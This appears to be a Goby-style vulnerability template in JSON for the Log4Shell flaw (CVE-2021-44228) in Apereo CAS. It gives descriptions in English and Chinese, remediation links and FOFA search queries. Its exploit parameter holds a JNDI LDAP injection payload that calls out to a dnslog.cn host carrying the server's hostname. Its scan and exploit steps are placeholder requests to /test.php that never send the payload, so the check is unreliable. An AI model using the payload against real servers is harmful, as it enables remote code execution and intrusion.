{ "Name": "apereo CAS log4shell RCE vulnerability (CVE-2021-44228)", "Description": "

Apereo CAS is an open-source, multilingual enterprise single sign-on solution for the web.

apereo CAS has a log4shell RCE vulnerability. Attackers can use this vulnerability to execute code on the server side, write backdoors, obtain server permissions, and then control the entire web server.

", "Product": "apereo CAS", "Homepage": "https://github.com/apereo/cas", "DisclosureDate": "2021-12-22", "Author": "keeeee", "FofaQuery": "app=\"apereo-CAS\"", "GobyQuery": "app=\"apereo-CAS\"", "Level": "3", "Impact": "

Attackers can use this vulnerability to execute code on the server side, write backdoors, obtain server permissions, and then control the entire web server.

", "Recommendation": "

The vendor has released a solution; please upgrade to the new version: https://apereo.github.io/2021/12/11/log4j-vuln/

1. Deploy a web application firewall to monitor database operations.

2. Unless it is necessary, prohibit public network access to the system.

", "Translation": { "CN": { "Name": "apereo CAS log4shell 命令执行漏洞(CVE-2021-44228)", "Product": "apereo CAS", "VulType": [ "命令执行" ], "Tags": [ "命令执行" ], "Description": "

apereo CAS 是一个开源的用于 Web 的企业多语言单点登录解决方案。

apereo CAS 存在 log4shell RCE 漏洞。攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。

", "Impact": "

攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。

", "Recommendation": "

厂商已发布了漏洞方案,请及时关注: https://apereo.github.io/2021/12/11/log4j-vuln/

1、通过防火墙等安全设备设置访问策略,设置白名单访问。

2、如非必要,禁止公网访问该系统。

" } }, "References": [ "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228", "https://nvd.nist.gov/vuln/detail/CVE-2021-44228", "https://apereo.github.io/2021/12/11/log4j-vuln/" ], "HasExp": true, "ExpParams": [ { "name": "dnslog", "type": "input", "value": "${jndi:ldap://${hostName}.xxx.dnslog.cn}" } ], "ExpTips": null, "ScanSteps": [ "AND", { "Request": { "method": "GET", "uri": "/test.php", "follow_redirect": true, "header": {}, "data_type": "text", "data": "" }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" }, { "type": "item", "variable": "$body", "operation": "contains", "value": "test", "bz": "" } ] }, "SetVariable": [] } ], "Tags": [ "rce" ], "VulType": [ "rce" ], "CVEIDs": [ "CVE-2021-44228" ], "CVSSScore": "10.0", "AttackSurfaces": { "Application": null, "Support": null, "Service": null, "System": null, "Hardware": null }, "CNNVD": [ "CNNVD-202112-799" ], "CNVD": [ "CNVD-2021-95914" ], "ExploitSteps": [ "AND", { "Request": { "method": "GET", "uri": "/test.php", "follow_redirect": true, "header": {}, "data_type": "text", "data": "" }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" }, { "type": "item", "variable": "$body", "operation": "contains", "value": "test", "bz": "" } ] }, "SetVariable": [] } ], "Is0day": false }